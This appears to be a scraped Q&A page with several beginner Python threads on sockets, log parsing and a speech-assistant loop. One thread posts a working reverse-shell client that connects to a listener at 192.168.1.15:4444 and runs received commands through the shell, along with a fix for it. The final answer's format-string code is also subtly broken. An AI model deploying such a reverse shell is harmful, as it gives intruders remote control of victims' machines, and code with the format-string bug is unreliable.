So I am doing this ungraded assignment from an online course (so please do not hesitate to post solutions to this nemesis of mine).
Assignment open the file from the webpage using import socket,prompt the user for the url, print 3000 first characters including header, but count all of the characters in the file.
So first I have done this:
import socket
import re
url = raw_input('Enter - ')
try:
hostname = re.findall('http://(.+?)/', url)
hostname = hostname[0]
mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
mysock.connect((hostname, 80))
mysock.send('GET ' + url + ' HTTP/1.0\n\n')
count = 0
text = str()
while True:
data = mysock.recv(512)
if ( len(data) < 1 ) :
break
count += len(data)
if count <= 3000:
print data
mysock.close()
except:
print 'Please enter a valid URL'
print count
But every time I adjust the buffer in the mysock.recv() the output changes and I get random spaces inside the text.
Then I've done this which eliminated the funky random splits in lines but the output still differs depending on the buffer inside.
import socket
import re
url = raw_input('Enter - ')
try:
hostname = re.findall('http://(.+?)/', url)
hostname = hostname[0]
mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
mysock.connect((hostname, 80))
mysock.send('GET ' + url + ' HTTP/1.0\n\n')
count = 0
text = str()
while True:
data = mysock.recv(512)
if ( len(data) < 1 ) :
break
count += len(data)
if count <= 3000:
data.rstrip()
text = text + data
mysock.close()
except:
print 'Please enter a valid URL'
print text
print count
So I've been at it for several hours now and still can't get the exact same output regardless of the size of the buffer without funky line splitting spaces in there.
the file that I use: http://www.py4inf.com/code/romeo-full.txt
I'm studying on same book and i'm on same exercise. Question is 3 years old but don't give af, maybe is helpful for someone.
On first you can't print data in that way. You need something like this:
while True:
data = mysock.recv(512)
if len(data) < 1:
break
print(data.decode(),end='')
Also, it's perfectly normal that you haven't same results if you change the buffer 512 because count variable depends on it. Anyway the author asked just to stop after showing 3000 chars.
My full code (will works only with HTTP, HTTPS not handled):
import socket
import sys
import validators
import urllib.parse
url = input('Insert url to fetch: ')
# Test valid url
try:
valid = validators.url(url)
if valid != True:
raise ValueError
except ValueError:
print('url incorrect')
sys.exit()
# Test socket connection
try:
mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print('\nSocket successfully created')
except socket.error as err:
print('Socket creation failed with error %s' %(err))
# Extract hostname of url
parsed_url = urllib.parse.urlparse(url)
print('Resolving ->', parsed_url.netloc)
# Test if we can resolve the host
try:
host_ip = socket.gethostbyname(parsed_url.netloc)
except socket.gaierror:
print('Unable to resolve', parsed_url.netloc)
sys.exit()
# Connect to host
mysock.connect((parsed_url.netloc, 80))
# Crafting our command to send
cmd = ('GET ' + url + ' HTTP/1.0\r\n\r\n').encode()
# Sending our command
mysock.send(cmd)
count = 0
# Receive data
while True:
data = mysock.recv(500)
count += len(data)
if len(data) < 1:
break
if count > 3000:
break
print(data.decode(),end='')
mysock.close()
Could be the solution, maybe
Related
I am currently working on a reverse DNS script intended to open a log file, find the IP address, then resolve the IP to DNS. I have a regex set up to identify the IP address in the file, but when I added socket.gethostbyaddr to my script the script ignores my regex and still lists objects in the file that are not IP addresses. I've never used Python before, but this is what I have right now:
import socket
import re
f = open('ipidk.txt' , 'r')
lines = f.readlines()
raw_data = str(f.readlines())
regex = r'(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})'
foundip = re.findall( regex, raw_data )
for raw_data in lines:
host = raw_data.strip()
try:
dns = socket.gethostbyaddr(host)
print("%s - %s" % (host, dns))
except socket.error as exc:
pass
f.close()
You're calling f.readlines() twice. The first time reads everything in the file, and puts that in lines. The second time has nothing left to read (it starts reading from the current file position, it doesn't rewind to the beginning), so it returns an empty list, and raw_data will just be "[]", with no IPs.
Just call f.read() once, and assign that to raw_data.
Then you need to loop over the IPs found with the regexp, not lines.
import socket
import re
with open('ipidk.txt' , 'r') as f:
raw_data = f.read()
regex = r'(?:\d{1,3}\.){3}\d{1,3}'
foundip = re.findall( regex, raw_data )
for host in foundip:
try:
dns = socket.gethostbyaddr(host)
print("%s - %s" % (host, dns))
except socket.error as exc:
pass
I aim to make my jarvis, which listens all the time and activates when I say hello. I learned that Google cloud Speech to Text API doesn't listen for more than 60 seconds, but then I found this not-so-famous link, where this listens for infinite duration. The author of github script says that, he has played a trick that script refreshes after 60 seconds, so that program doesn't crash.
https://github.com/GoogleCloudPlatform/python-docs-samples/blob/master/speech/cloud-client/transcribe_streaming_indefinite.py
Following is the modified version, since I wanted it to answer of my questions, followed by "hello", and not answer me all the time. Now if I ask my Jarvis, a question, which while answering takes more than 60 seconds and it doesn't get the time to refresh, the program crashes down :(
#!/usr/bin/env python
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Google Cloud Speech API sample application using the streaming API.
NOTE: This module requires the additional dependency `pyaudio`. To install
using pip:
pip install pyaudio
Example usage:
python transcribe_streaming_indefinite.py
"""
# [START speech_transcribe_infinite_streaming]
from __future__ import division
import time
import re
import sys
import os
from google.cloud import speech
from pygame.mixer import *
from googletrans import Translator
# running=True
translator = Translator()
init()
import pyaudio
from six.moves import queue
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "C:\\Users\\mnauf\\Desktop\\rehandevice\\key.json"
from commands2 import commander
cmd=commander()
# Audio recording parameters
STREAMING_LIMIT = 55000
SAMPLE_RATE = 16000
CHUNK_SIZE = int(SAMPLE_RATE / 10) # 100ms
def get_current_time():
return int(round(time.time() * 1000))
def duration_to_secs(duration):
return duration.seconds + (duration.nanos / float(1e9))
class ResumableMicrophoneStream:
"""Opens a recording stream as a generator yielding the audio chunks."""
def __init__(self, rate, chunk_size):
self._rate = rate
self._chunk_size = chunk_size
self._num_channels = 1
self._max_replay_secs = 5
# Create a thread-safe buffer of audio data
self._buff = queue.Queue()
self.closed = True
self.start_time = get_current_time()
# 2 bytes in 16 bit samples
self._bytes_per_sample = 2 * self._num_channels
self._bytes_per_second = self._rate * self._bytes_per_sample
self._bytes_per_chunk = (self._chunk_size * self._bytes_per_sample)
self._chunks_per_second = (
self._bytes_per_second // self._bytes_per_chunk)
def __enter__(self):
self.closed = False
self._audio_interface = pyaudio.PyAudio()
self._audio_stream = self._audio_interface.open(
format=pyaudio.paInt16,
channels=self._num_channels,
rate=self._rate,
input=True,
frames_per_buffer=self._chunk_size,
# Run the audio stream asynchronously to fill the buffer object.
# This is necessary so that the input device's buffer doesn't
# overflow while the calling thread makes network requests, etc.
stream_callback=self._fill_buffer,
)
return self
def __exit__(self, type, value, traceback):
self._audio_stream.stop_stream()
self._audio_stream.close()
self.closed = True
# Signal the generator to terminate so that the client's
# streaming_recognize method will not block the process termination.
self._buff.put(None)
self._audio_interface.terminate()
def _fill_buffer(self, in_data, *args, **kwargs):
"""Continuously collect data from the audio stream, into the buffer."""
self._buff.put(in_data)
return None, pyaudio.paContinue
def generator(self):
while not self.closed:
if get_current_time() - self.start_time > STREAMING_LIMIT:
self.start_time = get_current_time()
break
# Use a blocking get() to ensure there's at least one chunk of
# data, and stop iteration if the chunk is None, indicating the
# end of the audio stream.
chunk = self._buff.get()
if chunk is None:
return
data = [chunk]
# Now consume whatever other data's still buffered.
while True:
try:
chunk = self._buff.get(block=False)
if chunk is None:
return
data.append(chunk)
except queue.Empty:
break
yield b''.join(data)
def search(responses, stream, code):
responses = (r for r in responses if (
r.results and r.results[0].alternatives))
num_chars_printed = 0
for response in responses:
if not response.results:
continue
# The `results` list is consecutive. For streaming, we only care about
# the first result being considered, since once it's `is_final`, it
# moves on to considering the next utterance.
result = response.results[0]
if not result.alternatives:
continue
# Display the transcription of the top alternative.
top_alternative = result.alternatives[0]
transcript = top_alternative.transcript
# music.load("/home/pi/Desktop/rehandevice/end.mp3")
# music.play()
# Display interim results, but with a carriage return at the end of the
# line, so subsequent lines will overwrite them.
# If the previous result was longer than this one, we need to print
# some extra spaces to overwrite the previous result
overwrite_chars = ' ' * (num_chars_printed - len(transcript))
if not result.is_final:
sys.stdout.write(transcript + overwrite_chars + '\r')
sys.stdout.flush()
num_chars_printed = len(transcript)
else:
#print(transcript + overwrite_chars)
# Exit recognition if any of the transcribed phrases could be
# one of our keywords.
if code=='ur-PK':
transcript=translator.translate(transcript).text
print("Your command: ", transcript + overwrite_chars)
if "hindi assistant" in (transcript+overwrite_chars).lower():
cmd.respond("Alright. Talk to me in urdu",code=code)
main('ur-PK')
elif "english assistant" in (transcript+overwrite_chars).lower():
cmd.respond("Alright. Talk to me in English",code=code)
main('en-US')
cmd.discover(text=transcript + overwrite_chars,code=code)
for i in range(10):
print("Hello world")
break
num_chars_printed = 0
def listen_print_loop(responses, stream, code):
"""Iterates through server responses and prints them.
The responses passed is a generator that will block until a response
is provided by the server.
Each response may contain multiple results, and each result may contain
multiple alternatives; for details, see https://cloud.google.com/speech-to-text/docs/reference/rpc/google.cloud.speech.v1#streamingrecognizeresponse. Here we
print only the transcription for the top alternative of the top result.
In this case, responses are provided for interim results as well. If the
response is an interim one, print a line feed at the end of it, to allow
the next result to overwrite it, until the response is a final one. For the
final one, print a newline to preserve the finalized transcription.
"""
responses = (r for r in responses if (
r.results and r.results[0].alternatives))
music.load(r"C:\\Users\\mnauf\\Desktop\\rehandevice\\coins.mp3")
num_chars_printed = 0
for response in responses:
if not response.results:
continue
# The `results` list is consecutive. For streaming, we only care about
# the first result being considered, since once it's `is_final`, it
# moves on to considering the next utterance.
result = response.results[0]
if not result.alternatives:
continue
# Display the transcription of the top alternative.
top_alternative = result.alternatives[0]
transcript = top_alternative.transcript
# Display interim results, but with a carriage return at the end of the
# line, so subsequent lines will overwrite them.
#
# If the previous result was longer than this one, we need to print
# some extra spaces to overwrite the previous result
overwrite_chars = ' ' * (num_chars_printed - len(transcript))
if not result.is_final:
sys.stdout.write(transcript + overwrite_chars + '\r')
sys.stdout.flush()
num_chars_printed = len(transcript)
else:
print("Listen print loop", transcript + overwrite_chars)
# Exit recognition if any of the transcribed phrases could be
# one of our keywords.
if re.search(r'\b(hello)\b', transcript.lower(), re.I):
#print("Give me order")
music.play()
search(responses, stream,code)
break
elif re.search(r'\b(ہیلو)\b', transcript, re.I):
music.play()
search(responses, stream,code)
break
num_chars_printed = 0
def main(code):
cmd.respond("I am Rayhaan dot A Eye. How can I help you?",code=code)
client = speech.SpeechClient()
config = speech.types.RecognitionConfig(
encoding=speech.enums.RecognitionConfig.AudioEncoding.LINEAR16,
sample_rate_hertz=SAMPLE_RATE,
language_code='en-US',
max_alternatives=1,
enable_word_time_offsets=True)
streaming_config = speech.types.StreamingRecognitionConfig(
config=config,
interim_results=True)
mic_manager = ResumableMicrophoneStream(SAMPLE_RATE, CHUNK_SIZE)
print('Say "Quit" or "Exit" to terminate the program.')
with mic_manager as stream:
while not stream.closed:
audio_generator = stream.generator()
requests = (speech.types.StreamingRecognizeRequest(
audio_content=content)
for content in audio_generator)
responses = client.streaming_recognize(streaming_config,
requests)
# Now, put the transcription responses to use.
try:
listen_print_loop(responses, stream, code)
except:
listen
if __name__ == '__main__':
main('en-US')
# [END speech_transcribe_infinite_streaming]
You can call your functions after recognition in different thread. Example:
new_thread = Thread(target=music.play)
new_thread.daemon = True # Not always needed, read more about daemon property
new_thread.start()
Or if you want just to prevent exception - you can always use try/except. Example:
with mic_manager as stream:
while not stream.closed:
try:
audio_generator = stream.generator()
requests = (speech.types.StreamingRecognizeRequest(
audio_content=content)
for content in audio_generator)
responses = client.streaming_recognize(streaming_config,
requests)
# Now, put the transcription responses to use.
listen_print_loop(responses, stream, code)
except BaseException as e:
print("Exception occurred - {}".format(str(e)))
I'm making a simple Python 2.7 reverse-shell , for the directory change function everytime I type cd C:\ in my netcat server it throws this error "WindowsError: [Error 123] The filename, directory name, or volume label syntax is incorrect: 'C:\\n'" Here is my code.
import socket
import os
import subprocess
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "192.168.1.15"
port = 4444
s.connect((host, port))
s.send(os.getcwd() + '> ')
def Shell():
while True:
data = s.recv(1024)
if data[:2] == 'cd':
os.chdir(data[3:])
if len(data) > 0:
proc = subprocess.Popen(data, shell = True ,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
result = proc.stdout.read() + proc.stderr.read()
s.send(result)
s.send(os.getcwd() + '> ')
print(data)
Shell()
When you use data = s.recv(1024) to receive data from remote, the \n character, generated when you press Enter to end current input, will be received at the same time.
So you just need to .strip() it, or use [:-1] to remove the last character (which is \n), when you get data.
data = s.recv(1024).strip()
or
data = s.recv(1024)[:-1]
may both OK.
New to Python here.
I am trying to get the most active ip address from a log.txt file and print it in another text file. My first step is to get all the ip addresses. Second to sort the most occurring ip address. But I am stuck in the first step which is:
with open('./log_input/log.txt', 'r+') as f:
# loops the lines in teh text file
for line in f:
# split line at whitespace
cols = line.split()
# get last column
byte_size = cols[-1]
# get the first column [0]
ip_addresses = cols[0]
# remove brackets
byte_size = byte_size.strip('[]')
# write the byte size in the resource file
resource_file = open('./log_output/resources.txt', 'a')
resource_file.write(byte_size + '\n')
resource_file.truncate()
# write the ip addresses in the host file
host_file = open('./log_output/hosts.txt', 'a')
host_file.seek(0)
host_file.write(ip_addresses + '\n')
host_file.truncate()
resource_file.close()
host_file.close()
The problem is in the new host.txt file, it reprints the ip addresses instead of overwriting. I tried this too:
resource_file = open('./log_output/resources.txt', 'w')
host_file = open('./log_output/hosts.txt', 'w')
and 'w+' and so on.. but w or w+ gives only one ip address in the host file.
Can someone guide me through this?
Sample Input File
www-c2.proxy.aol.com - - [01/Jul/1995:00:03:52 -0400] "GET /history/skylab/skylab-1.html HTTP/1.0" 200 1659
isdn6-34.dnai.com - - [01/Jul/1995:00:03:52 -0400] "GET /images/kscmap-tiny.gif HTTP/1.0" 200 2537
isdn6-34.dnai.com - - [01/Jul/1995:00:03:52 -0400] "GET /images/ksclogosmall.gif HTTP/1.0" 200 3635
ix-ftw-tx1-24.ix.netcom.com - - [01/Jul/1995:00:03:52 -0400] "GET /shuttle/countdown/count.gif HTTP/1.0" 200 40310
collections.Counter is a handy tool for counting things. Feed it a bunch of text strings and it will create a dict mapping the text to the number of times that text is seen. Now counting IP addresses is easy
>>> import collections
>>> with open('log.txt') as fp:
... counter = collections.Counter(line.split(' ', 1)[0].lower() for line in fp)
...
>>> counter
Counter({'isdn6-34.dnai.com': 2, 'ix-ftw-tx1-24.ix.netcom.com': 1, 'www-c2.proxy.aol.com': 1})
>>> counter.most_common(1)
[('isdn6-34.dnai.com', 2)]
>>>
>>>
>>> with open('most_common.txt', 'w') as fp:
... fp.write(counter.most_common(1)[0][0])
...
17
>>> open('most_common.txt').read()
'isdn6-34.dnai.com'
Thanks for all the help and suggestion.. this fixed my problem.
with open('./log_input/log.txt', 'r+') as f:
# loops the lines in teh text file
new_ip_addresses = ""
new_byte_sizes = ""
new_time_stamp = ""
resource_file = open('./log_output/resources.txt', 'w')
host_file = open('./log_output/hosts.txt', 'w')
hours_file = open('./log_output/hours.txt', 'w')
for line in f:
# print re.findall("\[(.*?)\]", line) # ['Hi all', 'this is', 'an example']
# split line at whitespace
cols = line.split(' ')
#get the time stamp times
# print(cols[4])
# get byte sizes from the
byte_size = cols[-1]
new_byte_sizes += byte_size
# get ip/host
ip_addresses = cols[0]
new_ip_addresses += ip_addresses + '\n'
# remove brackets
byte_size = byte_size.strip('[]')
# write the byte size in the resource file
print(new_byte_sizes)
resource_file.write(new_byte_sizes)
resource_file.close()
# write the ip addresses in the host file
print(new_ip_addresses)
host_file.write(new_ip_addresses)
host_file.close()
# write the ip addresses in the host file
print(new_ip_addresses)
host_file.write(new_ip_addresses)
host_file.close()
Basically assigning the value to the variable inside the for loop and adding new line solved it for me.
new_ip_addresses += ip_addresses + '\n'
I am doing an exercise for an online course and keep getting an error thrown at me. Theres another 404 error in the output as well actually. I believe there are really only 2 spots where this could go haywire, line 11 and 13 but it looks correct to me. If I replace the variables with fixed addresses (not user generated) it works fine. Thanks for your help.
import socket
site= raw_input("Enter url:")
print ""
print "site is",site
print ""
hostel = site.split("/")
print "Hostel is", hostel
print ""
mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
mysock.connect((hostel[2], 80))
mysock.send('GET site HTTP/1.0\n\n')
while True:
data = mysock.recv(1024)
data = data.strip()
if len(data) < 1:
break
print data
mysock.close()
You're not using your site variable here, but literally requesting "site":
mysock.send('GET site HTTP/1.0\n\n')
Try:
mysock.send('GET ' + site + ' HTTP/1.0\n\n')
You should use the variable 'site' instead of the word site try:
message_send = "GET / HTTP/1.1\r\nHost: %s\r\n\r\n".format(site)
mysock.send(message_send)